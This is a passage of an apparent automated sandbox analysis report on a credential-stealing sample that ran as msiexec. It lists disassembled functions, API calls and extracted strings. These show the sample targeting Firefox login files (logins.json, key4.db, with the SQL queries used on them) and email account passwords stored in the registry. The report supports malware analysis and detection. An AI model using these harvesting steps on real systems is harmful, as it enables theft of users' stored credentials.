                                                                                                        • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                        • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                        • API String ID: 3963849919-1658304561
                                                                                                        • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                        • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                        • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                        • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                        Function 004016FD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??2@??3@memcpymemset
                                                                                                        • String ID: (yE$(yE$(yE
                                                                                                        • API String ID: 1865533344-362086290
                                                                                                        • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                                        • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                                        • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                                        • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                                        Function 0040E501 Relevance: 54.6, APIs: 21, Strings: 10, Instructions: 314COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                          • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                          • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                          • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                          • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                                          • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                        • memset.MSVCRT ref: 0040E5B8
                                                                                                        • memset.MSVCRT ref: 0040E5CD
                                                                                                        • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                        • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                        • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                        • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                        • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                        • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                        • memset.MSVCRT ref: 0040E6B5
                                                                                                        • memset.MSVCRT ref: 0040E6CC
                                                                                                          • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                          • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                                        • memset.MSVCRT ref: 0040E736
                                                                                                        • memset.MSVCRT ref: 0040E74F
                                                                                                        • sprintf.MSVCRT ref: 0040E76D
                                                                                                        • sprintf.MSVCRT ref: 0040E788
                                                                                                        • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                        • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                        • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                        • memset.MSVCRT ref: 0040E858
                                                                                                        • sprintf.MSVCRT ref: 0040E873
                                                                                                        • _strcmpi.MSVCRT ref: 0040E889
                                                                                                        • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                        • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                        • API String ID: 4171719235-3943159138
                                                                                                        • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                                        • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                        • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                                        • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                        Function 00410401 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                        • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                        • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                        • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                        • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                        • GetDC.USER32 ref: 004104E2
                                                                                                        • strlen.MSVCRT ref: 00410522
                                                                                                        • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                        • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                        • sprintf.MSVCRT ref: 00410640
                                                                                                        • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                        • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                        • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                        • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                        • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                        • String ID: %s:$EDIT$STATIC
                                                                                                        • API String ID: 1703216249-3046471546
                                                                                                        • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                                        • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                        • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                                        • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                        Function 0040244A Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004024F5
                                                                                                          • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                        • _mbscpy.MSVCRT(?,00000000,?,?,?,67CB7B60,?,00000000), ref: 00402533
                                                                                                        • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _mbscpy$QueryValuememset
                                                                                                        • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                        • API String ID: 168965057-606283353
                                                                                                        • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                                                        • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                        • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                                                        • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                        Function 004027BE Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 122COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00402869
                                                                                                          • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                        • _mbscpy.MSVCRT(?,?,67CB7B60,?,00000000), ref: 004028A3
                                                                                                          • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,67CB7B60,?,00000000), ref: 0040297B
                                                                                                          • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                        • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                        • API String ID: 1497257669-167382505
                                                                                                        • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                        • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                                                        • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                        • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                                                                        Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                        • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                        • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                        • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                        • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                        • DeleteObject.GDI32(?), ref: 00401226
                                                                                                        • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                        • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                        • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                        • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                        • memset.MSVCRT ref: 0040128E
                                                                                                        • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                        • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                        • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 2998058495-0
                                                                                                        • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                                        • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                        • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                                        • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                        Function 0044257F Relevance: 33.4, APIs: 7, Strings: 15, Instructions: 375COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                        • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                                        • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                                        • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                                        • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                                        • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                                        • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcmp$memcpy
                                                                                                        • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                        • API String ID: 231171946-2189169393
                                                                                                        • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                        • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                        • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                        • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                        Function 0041108D Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                        • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                        • API String ID: 633282248-1996832678
                                                                                                        • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                                        • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                        • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                                        • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                        Function 00406746 Relevance: 30.3, APIs: 16, Strings: 4, Instructions: 287COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00406782
                                                                                                          • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                          • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                        • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                                        • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                                                                        • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                                        • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                                                                        • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                                        • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                                                                        • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                                                                        • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                                        • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                                        • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                                        • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                                                                        • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                                        • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                                        Strings
                                                                                                        • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                        • key4.db, xrefs: 00406756
                                                                                                        • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                        • , xrefs: 00406834
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$memcmp$memsetstrlen
                                                                                                        • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                        • API String ID: 3614188050-3983245814
                                                                                                        • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                        • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                                        • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                        • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                                        Function 0040A953 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 182COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040A973
                                                                                                        • memset.MSVCRT ref: 0040A996
                                                                                                        • memset.MSVCRT ref: 0040A9AC
                                                                                                        • memset.MSVCRT ref: 0040A9BC
                                                                                                        • sprintf.MSVCRT ref: 0040A9F0
                                                                                                        • _mbscpy.MSVCRT(00000000, nowrap), ref: 0040AA37
                                                                                                        • sprintf.MSVCRT ref: 0040AABE
                                                                                                        • _mbscat.MSVCRT ref: 0040AAED
                                                                                                          • Part of subcall function 00410FD3: sprintf.MSVCRT ref: 00410FF7
                                                                                                        • _mbscpy.MSVCRT(?,?), ref: 0040AAD2
                                                                                                        • sprintf.MSVCRT ref: 0040AB21
                                                                                                          • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                          • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                        • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                        • API String ID: 710961058-601624466
                                                                                                        • Opcode ID: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                                        • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                                                                        • Opcode Fuzzy Hash: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                                        • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                                                                        Function 004111AA Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: sprintf$memset$_mbscpy
                                                                                                        • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                        • API String ID: 3402215030-3842416460
                                                                                                        • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                                        • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                        • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                                        • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                        Function 0040F0CE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 192stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                          • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                                          • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                          • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                          • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                          • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                          • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                          • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                          • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                          • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                          • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                        • strlen.MSVCRT ref: 0040F139
                                                                                                        • strlen.MSVCRT ref: 0040F147
                                                                                                        • memset.MSVCRT ref: 0040F187
                                                                                                        • strlen.MSVCRT ref: 0040F196
                                                                                                        • strlen.MSVCRT ref: 0040F1A4
                                                                                                        • memset.MSVCRT ref: 0040F1EA
                                                                                                        • strlen.MSVCRT ref: 0040F1F9
                                                                                                        • strlen.MSVCRT ref: 0040F207
                                                                                                        • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                        • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                        • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                          • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                          • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                        • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                        • API String ID: 2003275452-3138536805
                                                                                                        • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                                        • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                        • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                                        • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                                        Function 0040C3D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 111stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040C3F7
                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                        • strrchr.MSVCRT ref: 0040C417
                                                                                                        • _mbscat.MSVCRT ref: 0040C431
                                                                                                        • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
